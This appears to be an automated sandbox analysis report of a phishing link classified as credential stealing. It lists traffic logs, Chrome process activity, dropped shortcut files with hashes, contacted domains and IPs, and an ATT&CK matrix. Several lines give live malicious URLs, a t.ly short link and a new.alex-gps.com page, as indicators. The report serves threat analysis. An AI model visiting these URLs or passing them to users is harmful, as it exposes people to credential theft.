      Source: unknownNetwork traffic detected: HTTP traffic on port 49637 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49663 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49644 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49627 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49640 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49650 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49656
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49655
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49652
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49651
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49650
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49649
      Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49648
      Source: unknownNetwork traffic detected: HTTP traffic on port 49660 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49646
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49645
      Source: unknownNetwork traffic detected: HTTP traffic on port 49649 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49644
      Source: unknownNetwork traffic detected: HTTP traffic on port 49651 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49642
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49641
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49640
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49655 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49632 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49639 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49629 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49639
      Source: unknownNetwork traffic detected: HTTP traffic on port 49646 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49637
      Source: unknownNetwork traffic detected: HTTP traffic on port 49642 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49635
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49679
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49632
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49676
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49631
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49648 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
      Source: unknownNetwork traffic detected: HTTP traffic on port 49656 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49635 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49652 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49631 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49662 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49629
      Source: unknownNetwork traffic detected: HTTP traffic on port 49645 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49628
      Source: unknownNetwork traffic detected: HTTP traffic on port 49641 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49628 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49627
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
      Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49662 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49676 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49679 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.165.164.15:443 -> 192.168.2.16:49227 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49228 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49229 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49230 version: TLS 1.2
      Source: classification engineClassification label: mal80.phis.win@18/44@22/12
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,7542123173083046913,11597805470458725562,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/2jKWO"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,7542123173083046913,11597805470458725562,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Persistence and Installation Behavior

      barindex
      Source: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123NLLM: Page contains button: 'CLICK HERE' Source: '1.0.pages.csv'
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://t.ly/2jKWO100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://fontawesome.com0%URL Reputationsafe
      https://fontawesome.com/license/free0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      t.ly
      104.20.7.133
      truefalse
        unknown
        d2vgu95hoyrpkh.cloudfront.net
        18.245.31.78
        truefalse
          unknown
          cs837.wac.edgecastcdn.net
          192.229.133.221
          truefalse
            unknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              unknown
              new.alex-gps.com
              201.102.105.236
              truefalse
                unknown
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  unknown
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.36
                    truefalse
                      unknown
                      s-part-0039.t-0009.t-msedge.net
                      13.107.246.67
                      truefalse
                        unknown
                        15.164.165.52.in-addr.arpa
                        unknown
                        unknownfalse
                          unknown
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            unknown
                            www.w3schools.com
                            unknown
                            unknownfalse
                              unknown
                              cdn.socket.io
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                https://new.alex-gps.com/m/jsv.jsfalse
                                  unknown
                                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2false
                                    unknown
                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssfalse
                                      unknown
                                      https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                        unknown
                                        https://www.w3schools.com/w3css/4/w3.cssfalse
                                          unknown
                                          https://new.alex-gps.com/favicon.icofalse
                                            unknown
                                            https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123Ntrue
                                              unknown
                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2false
                                                unknown
                                                https://t.ly/2jKWOtrue
                                                  unknown
                                                  https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://fontawesome.comchromecache_85.1.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://google.comchromecache_78.1.dr, chromecache_77.1.drfalse
                                                      unknown
                                                      https://fontawesome.com/license/freechromecache_85.1.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.186.36
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      13.107.246.45
                                                      s-part-0017.t-0009.t-msedge.netUnited States
                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      13.107.246.67
                                                      s-part-0039.t-0009.t-msedge.netUnited States
                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      18.245.31.78
                                                      d2vgu95hoyrpkh.cloudfront.netUnited States
                                                      16509AMAZON-02USfalse
                                                      201.102.105.236
                                                      new.alex-gps.comMexico
                                                      8151UninetSAdeCVMXfalse
                                                      192.229.133.221
                                                      cs837.wac.edgecastcdn.netUnited States
                                                      15133EDGECASTUSfalse
                                                      18.245.187.88
                                                      unknownUnited States
                                                      16509AMAZON-02USfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      152.199.21.175
                                                      sni1gl.wpc.omegacdn.netUnited States
                                                      15133EDGECASTUSfalse
                                                      104.20.7.133
                                                      t.lyUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.17.25.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      IP
                                                      192.168.2.16
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1540584
                                                      Start date and time:2024-10-23 23:29:00 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Sample URL:https://t.ly/2jKWO
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal80.phis.win@18/44@22/12
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.185.206, 64.233.166.84, 34.104.35.123, 84.201.210.22, 172.217.16.202, 142.250.186.42, 172.217.16.138, 142.250.185.74, 142.250.186.138, 172.217.18.10, 216.58.206.74, 142.250.184.202, 172.217.18.106, 142.250.185.138, 216.58.206.42, 142.250.74.202, 142.250.186.106, 142.250.185.106, 142.250.186.170, 142.250.185.202, 142.250.184.227, 142.250.185.99, 142.250.186.142
                                                      • Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: https://t.ly/2jKWO
                                                      No simulations
                                                      InputOutput
                                                      URL: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N Model: claude-3-haiku-20240307
                                                      ```json
                                                      {
                                                        "contains_trigger_text": true,
                                                        "trigger_text": "CLICK HERE TO LISTEN",
                                                        "prominent_button_name": "CLICK HERE",
                                                        "text_input_field_labels": "unknown",
                                                        "pdf_icon_visible": false,
                                                        "has_visible_captcha": false,
                                                        "has_urgent_text": false,
                                                        "has_visible_qrcode": false
                                                      }
                                                      URL: https://new.alex-gps.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9ZEhCRFlWZz0mdWlkPVVTRVIwODEwMjAyNFUzNDEwMDg0MA==N0123N Model: claude-3-haiku-20240307
                                                      ```json
                                                      {
                                                        "brands": []
                                                      }
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 20:29:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2673
                                                      Entropy (8bit):3.987620038976739
                                                      Encrypted:false
                                                      SSDEEP:48:8GmdpTxlGH8UidAKZdA1FehwiZUklqehey+3:8Gk7wty
                                                      MD5:50CEDC57C0A5E272759242D9D2457C28
                                                      SHA1:E229BF6E369C17EC30108094E06D9368160187E0
                                                      SHA-256:8970607BBF61AE71B330F7471605704CE368CC5E01D55104DB870755457E2E61
                                                      SHA-512:E595616CB693941C1EB00B2B4801B62BD58BBE0D014BE9D6E8F57A66CD175BDD790AD018EB134316DF07EDB9AA22ED367D20EB1FC9DD6CA6469DC7DE89C7076C
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....B.6..%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 20:29:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2675
                                                      Entropy (8bit):4.0036531523627525
                                                      Encrypted:false
                                                      SSDEEP:48:88mdpTxlGH8UidAKZdA1seh/iZUkAQkqehdy+2:88k7m9Q0y
                                                      MD5:4258D27A3B2EF158C227D98B57C2B9B1
                                                      SHA1:AE440E7BF445211EF6D0F29DD1D927117192887C
                                                      SHA-256:2571ADB013FE2594C28AE7F3086511ED6E1A0E1AD96DF642FD4367FF0B80C059
                                                      SHA-512:9F6355805A91386C44228CB97D9FC554B676BAE6A27E0B0EC021EB04C2AEAEF6BF21BC963BB35BEA82BABA169E000DB5757C93E93A7B0E93F9AE4F3D5FC26B62
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....w.*..%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2689
                                                      Entropy (8bit):4.010414772030653
                                                      Encrypted:false
                                                      SSDEEP:48:8qdpTxlAH8UidAKZdA14meh7sFiZUkmgqeh7s7y+BX:8o78nRy
                                                      MD5:8292E06A30B838B78FA16AC36E000177
                                                      SHA1:2E1F9564F89D0FFA81A01A8397EBF6FA9C6F2BF8
                                                      SHA-256:8F183C7C1EDCBA0D52E5DEF62732A80F7F535B4275AB7438B71C6F2092E5568B
                                                      SHA-512:FAC283A2D879D4D91C3BE64369EF21DC1160907DDBB3657AF7AAFC0D88F5460C9706D6A9702DC134D3AE4988B95B4A27F0DA8B85DBD1BAB00ECD8F5A3927581E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 20:29:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):4.001879463116697
                                                      Encrypted:false
                                                      SSDEEP:48:8ZmdpTxlGH8UidAKZdA1TehDiZUkwqehZy+R:8Zk79jy
                                                      MD5:DCCC1B0CBF25E0F23E10691952728CCB
                                                      SHA1:72C75F1BF5A120129BF1C4DCC7F4A8557EBCA557
                                                      SHA-256:34BB1C32731211FA95A7C1A998A076C864AA5B70F30FDCACD748CCF701D830CA
                                                      SHA-512:024732ED5BF798C673FF4322E4090690D948AAB4B5C86EE28574837930D1CA24D0621EEDD7E701FC40AE2997328ABBD63285939D71DFAC02E18F35514B0DCC4F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....+.$..%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............a......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 20:29:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):3.990482224202885
                                                      Encrypted:false
                                                      SSDEEP:48:86QmdpTxlGH8UidAKZdA1dehBiZUk1W1qeh/y+C:86Qk799fy
                                                      MD5:A201D191001A911CC634AA95B6802400
                                                      SHA1:55272AF6CF72F8781C726849DEDCA9A3F6C9B422
                                                      SHA-256:FE06E26F9BDBD2C42D64264E7D2F384286689C33225E003000BD2C4F1351D145
                                                      SHA-512:4444CB3F958E158FE44D3518E88EBA3815ADE87112B1B8A45B0AC89AE663F174F5C27BF948FF4BAE8D1AC372DB2693DD291420113DE7283F5E09CB9B84F91DEA
                                                      Malicious:false
                                                      Reputation:low
